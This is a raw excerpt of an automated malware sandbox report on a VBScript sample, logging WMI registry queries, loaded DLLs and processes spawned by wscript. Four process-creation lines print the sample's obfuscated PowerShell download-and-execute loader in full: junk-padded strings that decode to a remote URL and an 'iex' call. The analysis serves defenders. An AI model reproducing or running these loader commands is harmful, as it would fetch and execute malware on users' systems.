          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Cabinetted;++$Cabinetted;$Cabinetted=$Cabinetted-1;Function Cert69 ($Forretningsnavn){$Halvmaanedliges=5;$Halvmaanedliges++;For($Phylloscopine81=5; $Phylloscopine81 -lt $Forretningsnavn.Length-1; $Phylloscopine81+=$Halvmaanedliges){$Foreadapt = 'substring';$Slyngblte=$Forretningsnavn.$Foreadapt.Invoke($Phylloscopine81, 1);$Olfactible=$Olfactible+$Slyngblte}$Olfactible;}$uppishness=Cert69 'HypochfavnttDep.ct EkstpEl.dys Bowl: Libe/Snebo/Mornem IndiaBurnes DoomoOverl.ArmatgPolypeProj./ DesiwBeeswp Carp- Pr.va ygnid PanemEtaari AcrinFarad/KlassRT lkue BestcCompriResult Do seKartorKvi,keSupert Havo.Brn erVirusa Other In e ';$Wergilds=$uppishness.split([char]62);$uppishness=$Wergilds[0];$Batiste=Cert69 ' ForeiJurateAk hexMsurk ';$Sjusglas = Cert69 ' Lsni\ CymesNig eyVrtdys RediwNephroNuss wP.eud6Lymph4 Synt\havarWTan aicarponSam rdPol ro Dic.wIonpasAcardPResgso Arguw ReseeAnde rIndseS Frath sarceOmhyglPledglSeric\D plavSrdom1 .ytr.Rekur0St,ld\RepatpAlcoroskarpwUnorte,nglerUnagisIn.erhWifieeBlokel Flo.leuphe.NumereS.irixR,inoeParal ';&($Batiste) (Cert69 'Sterr$SkrivSAllo e Po.ykFe.lmsPos.tt Uncou Di.lr VrkssArgen=.onde$Ps.cheEpit.nBog nvTrla :m.ltew SbefiStrrenJ,rntd.amilisvrvgrGamet ') ;&($Batiste) (Cert69 'Askeb$Ra,gsS Cab,j O,gouSterss hiocgLarl.l GasbaAssems Per,=Cinqu$SarcoSVaabeeLit.ukUnm.nsRetintcompuuSkri,r luttsHanhu+Fravl$RelegS ndejSicyouPropos SplagmildelCr ssaFrotts S.rv ') ;&($Batiste) (Cert69 'Wayl,$CensuL LangeUnme.a llefCimb,wSilkeoBlderrAndelm ntes Fl.e Doku=Unrep Vexed(Afmel( ImaggTomhjwBagtrmHana.i Ev.n KursuwbortviProclnUdkrn3Uover2N.npa_Chinkp DietrJoggioOccupc DetoeDemensPseudsAxost propa-O.bytFLunyi IsoenPSeriorUnhypoTranscHatcheB,shbsolofss ubveItraved Appr=F.rre$Under{EthicP.unstI PhaeDUnpud}tvang),isco.TegucCAntaloU dermA socmP.digaF rtinmelildUkvemLAerosi OxygnChloreGitt.)Downh Boble-contrsUnnimp enetlWe biiUndert enfe Payi [Sleigc Ari,hBet aaSkkevr Acid]Un.in3Gevin4 opfi ');&($Batiste) (Cert69 'Krybe$ kretFHomofeRekrnmPol.ttAflydemil in TescaAudioaScenarConnis Kond Til =Disin Angli$Fu,dsL.isexeKontraSold,f KvalwChacro BrygrKaeftmCr.tisArr y[Krysa$ juniLnyanseByggea Sho,fLegemwimpoloVidtlrLakfamDuniesQ,adr.Quak cRespeoA.rusu onen,omictFerth- omkl2C,omp]Erst, ');&($Batiste) (Cert69 ' Unde$ .ircFbraysaKragesKmpehe UnstrBrystuTransmHoved= rrie( AdskT QualeAfgrssIntertUitot-Ra.urP.ompaaCrotctRegnsh npac Semit$c,ltoSDeaccj Tostu,rylls Udskg pseulFalbyaEncrysLi,id)Cereb N.rve-Kam.eA DrifnApperdS.alc Fu te(B.lan[SymboI Oro n ronatBrom,PkvalitScurrrNonfr]Uorga:Toba.:B.ithsUbevgi Forsz SquaeP,eud Scarl-Leucoe .illqCorad Distr8Palli)Manip ') ;if ($Faserum) {.$Sjusglas $Femtenaars;} else {;$Thysen=Cert69 'Ant.cSKogeptReaccaFysiorUnschtCalli-Ing.oBSengei,ircut FrdesSinusTTresirFicu.aCabbanQuonssHjem.f Melle.rbitr Hvae Verti- FidgSStemmoRgto,uWulfer FordcPernieGudst Fors $Unpa,uNitnipHybripDig eiLilyas SherhAlbat
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Cabinetted;++$Cabinetted;$Cabinetted=$Cabinetted-1;Function Cert69 ($Forretningsnavn){$Halvmaanedliges=5;$Halvmaanedliges++;For($Phylloscopine81=5; $Phylloscopine81 -lt $Forretningsnavn.Length-1; $Phylloscopine81+=$Halvmaanedliges){$Foreadapt = 'substring';$Slyngblte=$Forretningsnavn.$Foreadapt.Invoke($Phylloscopine81, 1);$Olfactible=$Olfactible+$Slyngblte}$Olfactible;}$uppishness=Cert69 'HypochfavnttDep.ct EkstpEl.dys Bowl: Libe/Snebo/Mornem IndiaBurnes DoomoOverl.ArmatgPolypeProj./ DesiwBeeswp Carp- Pr.va ygnid PanemEtaari AcrinFarad/KlassRT lkue BestcCompriResult Do seKartorKvi,keSupert Havo.Brn erVirusa Other In e ';$Wergilds=$uppishness.split([char]62);$uppishness=$Wergilds[0];$Batiste=Cert69 ' ForeiJurateAk hexMsurk ';$Sjusglas = Cert69 ' Lsni\ CymesNig eyVrtdys RediwNephroNuss wP.eud6Lymph4 Synt\havarWTan aicarponSam rdPol ro Dic.wIonpasAcardPResgso Arguw ReseeAnde rIndseS Frath sarceOmhyglPledglSeric\D plavSrdom1 .ytr.Rekur0St,ld\RepatpAlcoroskarpwUnorte,nglerUnagisIn.erhWifieeBlokel Flo.leuphe.NumereS.irixR,inoeParal ';&($Batiste) (Cert69 'Sterr$SkrivSAllo e Po.ykFe.lmsPos.tt Uncou Di.lr VrkssArgen=.onde$Ps.cheEpit.nBog nvTrla :m.ltew SbefiStrrenJ,rntd.amilisvrvgrGamet ') ;&($Batiste) (Cert69 'Askeb$Ra,gsS Cab,j O,gouSterss hiocgLarl.l GasbaAssems Per,=Cinqu$SarcoSVaabeeLit.ukUnm.nsRetintcompuuSkri,r luttsHanhu+Fravl$RelegS ndejSicyouPropos SplagmildelCr ssaFrotts S.rv ') ;&($Batiste) (Cert69 'Wayl,$CensuL LangeUnme.a llefCimb,wSilkeoBlderrAndelm ntes Fl.e Doku=Unrep Vexed(Afmel( ImaggTomhjwBagtrmHana.i Ev.n KursuwbortviProclnUdkrn3Uover2N.npa_Chinkp DietrJoggioOccupc DetoeDemensPseudsAxost propa-O.bytFLunyi IsoenPSeriorUnhypoTranscHatcheB,shbsolofss ubveItraved Appr=F.rre$Under{EthicP.unstI PhaeDUnpud}tvang),isco.TegucCAntaloU dermA socmP.digaF rtinmelildUkvemLAerosi OxygnChloreGitt.)Downh Boble-contrsUnnimp enetlWe biiUndert enfe Payi [Sleigc Ari,hBet aaSkkevr Acid]Un.in3Gevin4 opfi ');&($Batiste) (Cert69 'Krybe$ kretFHomofeRekrnmPol.ttAflydemil in TescaAudioaScenarConnis Kond Til =Disin Angli$Fu,dsL.isexeKontraSold,f KvalwChacro BrygrKaeftmCr.tisArr y[Krysa$ juniLnyanseByggea Sho,fLegemwimpoloVidtlrLakfamDuniesQ,adr.Quak cRespeoA.rusu onen,omictFerth- omkl2C,omp]Erst, ');&($Batiste) (Cert69 ' Unde$ .ircFbraysaKragesKmpehe UnstrBrystuTransmHoved= rrie( AdskT QualeAfgrssIntertUitot-Ra.urP.ompaaCrotctRegnsh npac Semit$c,ltoSDeaccj Tostu,rylls Udskg pseulFalbyaEncrysLi,id)Cereb N.rve-Kam.eA DrifnApperdS.alc Fu te(B.lan[SymboI Oro n ronatBrom,PkvalitScurrrNonfr]Uorga:Toba.:B.ithsUbevgi Forsz SquaeP,eud Scarl-Leucoe .illqCorad Distr8Palli)Manip ') ;if ($Faserum) {.$Sjusglas $Femtenaars;} else {;$Thysen=Cert69 'Ant.cSKogeptReaccaFysiorUnschtCalli-Ing.oBSengei,ircut FrdesSinusTTresirFicu.aCabbanQuonssHjem.f Melle.rbitr Hvae Verti- FidgSStemmoRgto,uWulfer FordcPernieGudst Fors $Unpa,uNitnipHybripDig eiLilyas SherhAlbatJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF8489DB1F23_2_00007FF8489DB1F2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF8489DA0363_2_00007FF8489DA036
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02C8CC385_2_02C8CC38
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02C8D5085_2_02C8D508
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02C8C8F05_2_02C8C8F0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07196E085_2_07196E08
          Source: BKGCONF-THD1914129-BKGCONF-THD1914129.vbsInitial sample: Strings found which are bigger than 50
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
